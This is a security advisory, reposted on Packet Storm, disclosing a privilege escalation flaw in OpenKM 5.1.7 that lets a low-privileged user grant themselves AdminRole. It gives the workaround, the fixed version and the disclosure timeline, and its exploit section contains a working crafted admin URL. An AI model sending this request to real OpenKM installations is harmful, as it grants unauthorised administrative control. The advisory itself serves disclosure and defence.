exploit the possibilities

OpenKM Document Management System 5.1.7 Privilege Escalation

OpenKM Document Management System 5.1.7 Privilege Escalation
Posted Jan 3, 2012
Authored by Cyrill Brunschwiler | Site csnc.ch

OpenKM Document Management System version 5.1.7 suffers from an authenticated privilege escalation vulnerability.

tags | exploit
MD5 | c854b82aaf61acf780dff9ac73f4b767

OpenKM Document Management System 5.1.7 Privilege Escalation

Change Mirror Download
########################################################################
##
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
########################################################################
##
#
# ID: COMPASS-2012-001
# Product: OpenKM Document Management System 5.1.7 [1]
# Vendor: OpenKM http://www.openkm.com/
# Subject: Privilege Escalation, Improper Access Control
# Risk: High
# Effect: Remotely exploitable
# Author: Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
# Date: August 6th 2011
#
########################################################################
##

Description:
------------
Cyrill Brunschwiler, Security Analyst at Compass Security Network
Computing,
Switzerland discovered an authorization flaw in the OpenKM solution.
OpenKM
does allow application administrators to manage users and to assign
roles.
Unfortunately, a standard user having the UserRole may alter the roles
of
existing account. This is possible because OpenKM does not properly
check
for the sufficient privileges. The changes are being applied even though
the
OpenKM user interface displays an "insufficient privileges" message to
the
unprivileged user.

Vulnerable:
-----------
OpenKM version 5.1.7

Not vulnerable:
---------------
OpenKM version 5.1.8

Workaround:
-----------
Grant access to /OpenKM/admin path to specific IPs only (requires
additional
WAF, Reverse Proxy setup[2] or web server IP restriction)

Exploit:
--------
Login as low privileged User (having the UserRole) and call the
following
URL to gain administrative privileges.

http://example.com/OpenKM/admin/Auth?action=userEdit&persist=true&usr_id
=usr&usr_active=on&usr_roles=AdminRole

Timeline:
---------
August 6th, Vulnerability discovered
August 9th, Vendor contacted
August 10th, Vendor notified
December 1st, Patched version released
January 2nd, Advisory released

References:
-----------
[1] OpenKM http://www.openkm.com/
is an Free/Libre document management system that provides a web
interface for
managing arbitrary files. OpenKM includes a content repository, Lucene
indexing, and jBPM workflow. The OpenKM system was developed using Java
technology.

[2] Open Source Web Entry Server
Talk at OWASP Appsec Washington D.C. in November 2010 about setting up
an
Apache based Open Source Web Entry Server
https://www.owasp.org/images/f/f4/AppSecDC_Open_Source_Web_Entry_Server_
V2.2.ppt
Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    2 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    15 Files
  • 20
    Oct 20th
    20 Files
  • 21
    Oct 21st
    12 Files
  • 22
    Oct 22nd
    14 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close